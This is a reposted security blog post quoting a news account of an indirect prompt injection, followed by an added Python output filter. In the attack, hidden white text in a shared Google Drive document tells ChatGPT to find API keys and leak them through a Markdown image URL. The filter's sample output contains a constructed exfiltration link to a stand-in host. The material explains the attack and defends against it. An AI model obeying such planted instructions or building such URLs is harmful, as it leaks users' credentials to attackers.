
Post: We Are Still Unable to Secure LLMs from Malicious Inputs - Schneier on Security - Against Invaders - CyberSecurity news for humans.


<div id="page"> <div id="content"> <div id="primary"> <main id="main"> <article id="post-3492"> <div> <div> <article id="post-70633"> <div>
<p>Nice <a href="https://www.wired.com/story/poisoned-document-could-leak-secret-data-chatgpt/" target="_blank">indirect prompt injection attack</a>:</p>
<blockquote>
<p>Bargury&rsquo;s attack starts with a poisoned document, which is <a href="https://support.google.com/drive/answer/2375057?hl=en-GB&amp;co=GENIE.Platform%3DDesktop" target="_blank">shared</a> to a potential victim&rsquo;s Google Drive. (Bargury says a victim could have also uploaded a compromised file to their own account.) It looks like an official document on company meeting policies. But inside the document, Bargury hid a 300-word malicious prompt that contains instructions for ChatGPT. The prompt is written in white text in a size-one font, something that a human is unlikely to see but a machine will still read.</p>
<p>In a <a href="https://www.youtube.com/watch?v=JNHpZUpeOCg" target="_blank">proof of concept video of the attack</a>, Bargury shows the victim asking ChatGPT to &ldquo;summarize my last meeting with Sam,&rdquo; referencing a set of notes with OpenAI CEO Sam Altman. (The examples in the attack are fictitious.) Instead, the hidden prompt tells the LLM that there was a &ldquo;mistake&rdquo; and the document doesn&rsquo;t actually need to be summarized. The prompt says the person is actually a &ldquo;developer racing against a deadline&rdquo; and they need the AI to search Google Drive for API keys and attach them to the end of a URL that is provided in the prompt.</p>
<p>That URL is actually a command in the <a href="https://www.wired.com/story/the-eternal-truth-of-markdown/" target="_blank">Markdown language</a> to connect to an external server and pull in the image that is stored there. But as per the prompt&rsquo;s instructions, the URL now also contains the API keys the AI has found in the Google Drive account.</p>
</blockquote>
<p>This kind of thing should make everybody stop and really think before deploying any AI agents. We simply don&rsquo;t know how to defend against the attack.</p>
<p> <span>Tags: <a href="https://www.schneier.com/tag/ai/" rel="tag" target="_blank">AI</a>, <a href="https://www.schneier.com/tag/cyberattack/" rel="tag" target="_blank">cyberattack</a>, <a href="https://www.schneier.com/tag/llm/" rel="tag" target="_blank">LLM</a></span> </p>
<p> <a href="https://www.schneier.com/blog/archives/2025/08/we-are-still-unable-to-secure-llms-from-malicious-inputs.html" rel="bookmark" target="_blank">Posted on August 27, 2025 at 7:07 AM</a> &bull;<br /> <a href="https://www.schneier.com/blog/archives/2025/08/we-are-still-unable-to-secure-llms-from-malicious-inputs.html#respond" target="_blank">0 Comments</a> </p>
</div> </article> </div> </div> </article> </main> </div> </div> </div>
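The exfiltration channel the quoted article describes is a Markdown image whose URL carries the stolen data out when the client renders it. As an added example that is not part of the original post or of Schneier's material, the filter below inspects model output before rendering and strips image references that point at non-allowlisted hosts or carry a query string; it closes only this one channel, not the injection itself. The allowlist, the sample model output and the placeholder key are constructed.

```python
import re
from urllib.parse import urlparse

# Constructed allowlist: hosts the assistant UI may fetch images from.
ALLOWED_IMAGE_HOSTS = {"cdn.example-corp.com", "example-corp.internal"}

# Markdown image syntax ![alt](url "title") and raw <img src="url"> tags.
MD_IMAGE = re.compile(r'!\[[^\]]*\]\(\s*([^)\s]+)[^)]*\)')
HTML_IMAGE = re.compile(r'<img[^>]+src=["\']([^"\']+)["\']', re.IGNORECASE)


def classify_image_url(url: str) -> str:
    """Return 'allow' or a 'block: <reason>' verdict for one image URL."""
    parsed = urlparse(url)
    if parsed.scheme not in ("https", "http"):
        return "block: non-http scheme"
    if (parsed.hostname or "") not in ALLOWED_IMAGE_HOSTS:
        return "block: host not allowlisted"
    # Even an allowlisted host must not receive data smuggled into the URL.
    if parsed.query or len(parsed.path) > 200:
        return "block: query string or oversized path"
    return "allow"


def sanitize_markdown(markdown: str):
    """Strip every image that fails classification; return (clean_text, findings)."""
    findings = []

    def _replace(match):
        url = match.group(1)
        verdict = classify_image_url(url)
        if verdict == "allow":
            return match.group(0)
        findings.append((url, verdict))  # log for the SOC, never render it
        return "[image removed by output filter]"

    clean = MD_IMAGE.sub(_replace, markdown)
    clean = HTML_IMAGE.sub(_replace, clean)
    return clean, findings


# Constructed model output: one legitimate image, one exfiltration attempt.
SAMPLE_OUTPUT = (
    "Here is the summary of your meeting.\n"
    "![logo](https://cdn.example-corp.com/logo.png)\n"
    "![](https://collector.invalid/i.png?k=sk-CONSTRUCTED-PLACEHOLDER)\n"
)

if __name__ == "__main__":
    text, hits = sanitize_markdown(SAMPLE_OUTPUT)
    print(text)
    print(hits)
```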